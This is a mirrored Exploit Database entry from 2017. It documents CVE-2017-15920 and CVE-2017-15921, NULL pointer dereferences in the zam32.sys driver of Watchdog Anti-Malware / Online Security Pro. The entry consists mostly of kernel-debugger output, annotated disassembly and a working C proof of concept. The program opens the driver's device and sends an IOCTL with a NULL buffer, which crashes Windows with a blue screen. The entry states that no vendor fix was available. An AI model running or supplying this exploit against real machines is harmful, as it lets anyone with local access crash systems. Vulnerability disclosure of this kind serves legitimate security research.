Watchdog Development Anti-Malware / Online Security Pro – NULL Pointer Dereference

• Exploit Database
• 120 阅读

• 作者： Parvez Anwar
  日期： 2017-10-26
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43058/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143

  /*   Exploit Title- Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference Date - 26th October 2017 Discovered by- Parvez Anwar (@parvezghh) Vendor Homepage- https://www.watchdogdevelopment.com/ Tested Version - 2.74.186.150 Driver Version - 2.21.63 - zam32.sys Tested on OS - 32bit Windows 7 SP1 CVE IDs- CVE-2017-15920 and CVE-2017-15921 Vendor fix url - Will be fixed in a future release Fixed Version- n/a Fixed driver ver - n/a       A null pointer dereference vulnerability is triggered when sending an operation to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or the input buffer size being 0 as they are not validated.   kd> dt nt!_irp @esi -r +0x000 Type : 0n6 +0x002 Size : 0x94 +0x004 MdlAddress : (null) +0x008 Flags: 0x60000 +0x00c AssociatedIrp: <unnamed-tag> +0x000 MasterIrp: (null) +0x000 IrpCount : 0n0 +0x000 SystemBuffer : (null)<----------- null pointer     0x80002010 ---------- CVE-2017-15921   kd> r eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0 nv up ei pl nz na po nc cs=0008ss=0010ds=0023es=0023fs=0030gs=0000 efl=00000202 zam32+0xdd9f: 9087cd9f ff30pushdword ptr [eax]ds:0023:00000000=????????     .text:90AD9104 pushoffset aIoctl_register; "IOCTL_REGISTER_PROCESS" .text:90AD9109 push0 .text:90AD910B pushedx ; Pointer to "DeviceIoControlHandler" string .text:90AD910C push208h .text:90AD9111 pushoffset aMain_c .text:90AD9116 push1 .text:90AD9118 callsub_90AD3ADA .text:90AD911D add esp, 18h .text:90AD9120 pushesi ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer" .text:90AD9121 callsub_90AD8D90   .text:90AD8D90 sub_90AD8D90proc near .text:90AD8D90 .text:90AD8D90 arg_0 = dword ptr8 .text:90AD8D90 .text:90AD8D90 pushebp .text:90AD8D91 mov ebp, esp .text:90AD8D93 callsub_90AD414A .text:90AD8D98 testeax, eax .text:90AD8D9A jzshort loc_90AD8DA6 .text:90AD8D9C mov eax, [ebp+arg_0]; Null pointer dereference .text:90AD8D9F pushdword ptr [eax] ; BSOD !!!! .text:90AD8DA1 callsub_90AD428C .text:90AD8DA6 .text:90AD8DA6 loc_90AD8DA6: .text:90AD8DA6 pop ebp .text:90AD8DA7 retn4 .text:90AD8DA7 sub_90AD8D90endp .text:90AD8DA7 .text:90AD8DAA     0x80002054 ---------- CVE-2017-15920   kd> r eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001 eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0 nv up ei pl zr na pe nc cs=0008ss=0010ds=0023es=0023fs=0030gs=0000 efl=00000246 zam32+0xe41a: 9087d41a c7061e010000mov dword ptr [esi],11Eh ds:0023:00000000=????????     .text:90AD9401 pushoffset aIoctl_get_driv; IOCTL_GET_DRIVER_PROTOCOL .text:90AD9406 push0 .text:90AD9408 pushedx .text:90AD9409 push2A3h .text:90AD940E pushoffset aMain_c .text:90AD9413 push1 .text:90AD9415 callsub_90AD3ADA .text:90AD941A mov dword ptr [esi], 11Eh ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer" .text:90AD9420 jmp loc_90AD9622     */     #include <stdio.h> #include <windows.h>   int main(int argc, char *argv[]) { HANDLE hDevice; char devhandle[MAX_PATH]; DWORDdwRetBytes = 0;     sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");   hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);   if(hDevice == INVALID_HANDLE_VALUE) { printf("\n[-] Open %s device failed\n\n", devhandle); return -1; } else { printf("\n[+] Open %s device successful", devhandle); }   printf("\n[~] Press any key to continue . . ."); getch();   DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL); //DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);   printf("\n[+] DoSed\n\n"); CloseHandle(hDevice); return 0; }